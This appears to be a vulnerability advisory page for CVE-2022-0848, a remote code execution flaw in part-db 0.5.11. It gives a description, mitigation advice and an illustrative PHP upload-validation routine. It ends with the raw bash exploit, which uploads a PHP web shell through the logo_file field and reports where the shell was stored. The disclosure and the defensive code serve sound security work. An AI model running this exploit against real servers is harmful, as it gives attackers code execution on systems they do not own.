vendor: part-db
by: Sunny Mehra
CVSS: 9.8 (CRITICAL)
Remote Code Execution (RCE)
CWE: 78
Product Name: part-db
Affected Version From: 2000.5.10
Affected Version To: 2000.5.11
Patch Exists: YES
Related CWE: CVE-2022-0848
CPE: part-db/part-db
Metasploit:
Other Scripts:
Platforms Tested: KALI OS
2022

part-db 0.5.11 – Remote Code Execution (RCE)

part-db 0.5.11 is vulnerable to Remote Code Execution (RCE) due to improper input validation. An attacker can craft a malicious payload and upload it to the vulnerable application, which can be used to execute arbitrary code on the server. This vulnerability is identified as CVE-2022-0848.

Mitigation:

Input validation should be properly implemented to prevent malicious payloads from being uploaded to the application. Additionally, the application should be configured to run with the least privileges necessary.
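
One way to implement the input validation recommended above, as an added example that is not Part-DB's own code or its actual patch: an allowlist-based handler for the `logo_file` upload field seen in the request on this page. The function name, the constant and the set of permitted image types are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper, not Part-DB's code or its actual fix.
// Allowlist: permitted extension => MIME type the file content must have.
const LABEL_LOGO_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

/**
 * Validate one entry of $_FILES and store it under a server-chosen name.
 * Returns the stored file name; throws RuntimeException on any rejection.
 * Requires the fileinfo extension for content sniffing.
 */
function store_label_logo(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file((string) ($file['tmp_name'] ?? ''))) {
        throw new RuntimeException('upload failed or was not an HTTP upload');
    }

    // 1. Extension allowlist: .phtml, .php, .phar and similar fail by omission.
    $ext = strtolower(pathinfo((string) ($file['name'] ?? ''), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, LABEL_LOGO_TYPES)) {
        throw new RuntimeException('file extension is not allowed');
    }

    // 2. Content check: sniff the bytes, ignore the client-supplied Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== LABEL_LOGO_TYPES[$ext]) {
        throw new RuntimeException('file content does not match its extension');
    }

    // 3. Server-generated name: the client controls neither name nor extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store upload');
    }
    return $name;
}

// Usage in an upload handler (field name and directory as they appear on this page):
// $stored = store_label_logo($_FILES['logo_file'], __DIR__ . '/data/media/labels');
```

Validation is one layer. Serving the `data/media/labels/` directory with script execution disabled in the web server limits the impact if a file is stored there by some other path.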

Exploit-DB raw data:

# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.] 
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host 
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"